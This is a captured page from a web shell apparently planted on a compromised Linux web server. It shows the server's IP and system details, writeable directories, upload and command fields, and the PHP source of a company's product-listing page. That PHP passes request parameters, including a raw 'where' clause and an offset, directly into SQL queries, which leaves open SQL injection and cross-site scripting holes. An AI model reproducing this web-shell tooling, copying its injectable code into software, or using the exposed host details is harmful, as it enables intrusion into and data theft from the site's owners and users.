403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)standraise.com/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)standraise.com/en/product.php
<?php
require("configure.php");
$page 		= $_GET['page'];
$productcatid 	=(int)$_GET['productcatid'];
$offset			= $_GET["offset"];
$where			= $_GET["where"];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Stand Raise Limited</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" type="text/css" href="../css/style.css" />
<script language="javascript"><!--
function popupWindow(url) {
  window.open(url,'popupWindow','toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,resizable=0,width=720,height=700,screenX=100,screenY=100,top=50,left=50')
}
//--></script>
</head>
<body bgcolor="#CCCCCC" leftmargin="0" topmargin="0" style="background-repeat:repeat-x" background="../images/main_bg.jpg">
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <!-- Header -->
	<?php require("header.php"); ?>
  </tr>
  <tr>
    <td height="52" align="center" valign="top">
	<!-- Menu -->
	<?php require("menu.php"); ?></td>
  </tr>
  <tr>
    <td align="left" valign="top" bgcolor="#FFFFFF"><table width="900" height="500" border="0" cellpadding="0" cellspacing="0">
      <tr><td width="215" align="left" valign="top" bgcolor="#E6E7E9"><img src="../images/menutop.jpg" />
	  		<!-- Sub Menu -->
			<?php require("submenu.php"); ?>
        </td>
        <td width="685" align="left" valign="top"><div class="colMiddle"><table border="0" cellpadding="0" cellspacing="0">
          <tr>
			<td width="655"><table width="655" border="0" cellpadding="0" cellspacing="0">
              <tr>
                <td class="title">
				<?					  
				  $sql = "SELECT * ";
				  $sql .= "FROM productcat ";
				  $sql .= "where productcatid = $productcatid ";
				  $result = mysql_query($sql);
				  $row = mysql_fetch_array($result,MYSQL_ASSOC);
				  if ($productcatid == "")
				  { 
					echo "Product";
					}else{
					echo $row{'productcatname'}; 
				  } 
				  ?></td>
              </tr>
              <tr>
                <td class="txt"><div class="colcontenttxt">
				<table border="0" cellpadding="0" cellspacing="0">

		<?
									$limit=9; 
									if (!$offset) $offset=0;

									if (strlen($where)==0)
									{
										if (strlen($productcatid)<>0)
										{
											$query_where .= "and productimage.productcatid = ". $productcatid ." ";
										}
										
									}
									else
									{
										$query_where = $where;
									}
									if (!$where) {
										if (empty($one) || empty($two)) {
										}
										$where=$query_where;
									}
									
									$sqlx = "select count(*) ";
									$sqlx .= "FROM productimage inner join productcat ";
									$sqlx .= "on productimage.productcatid = productcat.productcatid ";
									$sqlx .= "$query_where ";
									$sqlx = str_replace('\\','',$sqlx);
									$result=mysql_query($sqlx);

									list($numrec)=mysql_fetch_row($result);

									$numpage=intval($numrec/$limit);

									if ($numrec%$limit) {
										$numpage++; // add one page if remainder
									}
?>
		<!--start here-->
									<?
									if ($productcatid == '') {
											$sortby = 0;
										$sql_cat = " delete from tmpproduct";
										mysql_query($sql_cat);
										
										$sql_cat = " select * from productcat";
										$sql_cat .= " where parentid = 0";
										$sql_cat .= " order by parentid, sortby";
									//	echo $sql_cat."<br>";
										$res_cat = mysql_query($sql_cat);
										if (mysql_num_rows($res_cat) > 0) {
											while ($row_cat = mysql_fetch_array($res_cat)) {
												$sql_img = " select * from productcat c, productimage i";
												$sql_img .= " where (1=1)";
												$sql_img .= " and c.productcatid = i.productcatid";
												$sql_img .= " and (c.parentid = ".$row_cat["productcatid"];
												$sql_img .= " or c.productcatid =".$row_cat["productcatid"].")";
												$sql_img .= " order by parentid, sortby, sortbyimage";
									//			echo $sql_img."<br>"; 
												$res_img = mysql_query($sql_img);
												if (mysql_num_rows($res_img) > 0) {
													while ($row_img = mysql_fetch_array($res_img)) {
														$catid = $row_img["productcatid"];
														$name =  $row_img["productname"];
														$image =  $row_img["image"];
														$productimageid = $row_img["productimageid"];
														$sortby ++;
														$sql_ins = " insert into tmpproduct";
														$sql_ins .= " (productcatid, productname, image, sortby, productimageid)";
														$sql_ins .= " values ('$catid', '$name', '$image', '$sortby', '$productimageid')";			
									//					echo $sql_ins."<br>";
														mysql_query($sql_ins);	
													}
												}		
											}										
										}										
										$sqly = " select * from tmpproduct order by sortby";
										$sqly .= " limit $offset,$limit";
										//echo $sqly;
									} else {
										$sqly = "SELECT * ";
										$sqly .= "FROM productimage inner join productcat ";
										$sqly .= "on productimage.productcatid = productcat.productcatid ";
										$sqly .= "$query_where ";
										$sqly .= "order by productcat.parentid ASC, productcat.sortby, productimage.sortbyimage ";
										$sqly .= "limit $offset,$limit";
									}
									
									$x = 1;
									$y = 1;

										echo "<tr>";
										$result1 = mysql_query($sqly);

										while ($row = mysql_fetch_array($result1,MYSQL_ASSOC))
										{
											$bgcolor="#FFFFFF";
											if ($y == 1)
											{
											}
											elseif ($y == 4)
												echo "<tr>";
											elseif ($y == 7)
												echo "<tr>";
											/*elseif ($y == 10)
												echo "<tr>";*/
										?>
											
	<td valign="top">
	<table width="215" border="0" cellpadding="0" cellspacing="0">
	  <tr>
		<td width="210" align="left" valign="top">
		<a href="javascript:popupWindow('pop_product.php?productimageid=<?=$row{'productimageid'}?>')"><img src="..\admin\smallproduct\<?=$row{'image'}?>" border='0' width='200'></a></td>
	  </tr>
	  <tr>
		<td width="210" height="40" valign="top" class="txt">
		<a href="javascript:popupWindow('pop_product.php?productimageid=<?=$row{'productimageid'}?>')"><?=$row{'productname'}?></a></td>
	  </tr>
	</table>
	</td>
						<?
							if ($y == 3)
								echo "</tr>";
							elseif ($y == 6)
								echo "</tr>";
							elseif ($y == 9)
								echo "</tr>";
							/*elseif ($y == 12)
								echo "</tr>";*/
							$y = $y + 1;
						}
						?>
																
				<!--end here-->
				</table><? include("pagenav.php"); ?>
				  </div></td>
              </tr>
            </table></td>
          </tr>          
        </table>
        </div></td>
      </tr>
    </table></td>
  </tr>

<!-- Footer -->
<?php require("footer.php"); ?>
</table>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit